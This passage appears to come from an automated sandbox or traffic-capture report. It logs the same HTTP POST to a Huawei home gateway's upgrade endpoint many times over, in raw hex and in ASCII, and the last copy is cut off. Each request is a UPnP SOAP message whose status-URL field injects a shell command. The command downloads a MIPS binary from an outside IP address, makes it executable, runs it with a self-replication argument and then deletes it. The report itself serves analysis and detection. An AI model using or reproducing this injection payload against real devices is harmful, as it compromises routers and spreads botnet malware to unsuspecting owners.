79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 